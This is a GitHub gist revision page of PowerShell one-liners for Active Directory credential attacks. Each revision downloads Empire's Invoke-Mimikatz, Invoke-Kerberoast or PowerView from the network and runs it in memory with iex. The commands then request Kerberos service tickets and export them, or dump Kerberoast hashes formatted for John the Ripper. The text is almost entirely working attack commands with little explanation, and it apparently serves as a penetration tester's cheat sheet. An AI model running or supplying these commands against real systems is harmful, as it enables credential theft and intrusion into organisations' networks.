Last active
March 16, 2020 13:59
-
-
Save FrankSpierings/caf1fe0e4caced440ce1f863e047393d to your computer and use it in GitHub Desktop.
Revisions
-
FrankSpierings revised this gist
Jul 5, 2018 . 1 changed file with 5 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -8,3 +8,8 @@ $urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/ # For output to John use: # | Out-File -Encoding UTF8 -Force hashes.txt $urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast -OutputFormat John | Select-Object -ExpandProperty Hash |% {$_.replace(':',':$krb5tgs$23$')} # Invoke-Kerberoast.ps1 - Machine not part of AD / custom credentials # Run this using: powershell -STA # This will not work in powershell_ise.exe! $domain="lab.test" ;$server="10.0.0.1"; $cred = (Get-Credential "user01@$domain"); $urls = @("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/situational_awareness/network/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast -OutputFormat John -Server $server -Domain $domain -Credential $cred | Select-Object -ExpandProperty Hash |% {$_.replace(':',':$krb5tgs$23$')} -
Jul 5, 2018 . 1 changed file with 6 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,4 +2,9 @@ $urls = @("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; $domain=((Get-WmiObject Win32_ComputerSystem).Domain); Add-Type -AssemblyName System.IdentityModel; iex $("setspn.exe -T $domain -Q */*") | Select-String '^CN' -Context 0,1 |% {New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim()}; Invoke-Mimikatz -Command "`"kerberos::list /export`"" # Invoke-Kerberoast.ps1 $urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast # Invoke-Kerberoast.ps1 - Fix ':$krb5tgs$23$' # For output to John use: # | Out-File -Encoding UTF8 -Force hashes.txt $urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast -OutputFormat John | Select-Object -ExpandProperty Hash |% {$_.replace(':',':$krb5tgs$23$')} -
Jul 5, 2018 . 1 changed file with 4 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1 +1,5 @@ # Invoke-Mimikatz.ps1 $urls = @("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; $domain=((Get-WmiObject Win32_ComputerSystem).Domain); Add-Type -AssemblyName System.IdentityModel; iex $("setspn.exe -T $domain -Q */*") | Select-String '^CN' -Context 0,1 |% {New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim()}; Invoke-Mimikatz -Command "`"kerberos::list /export`"" # Invoke-Kerberoast.ps1 $urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast -
Jul 5, 2018 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1 @@ $urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast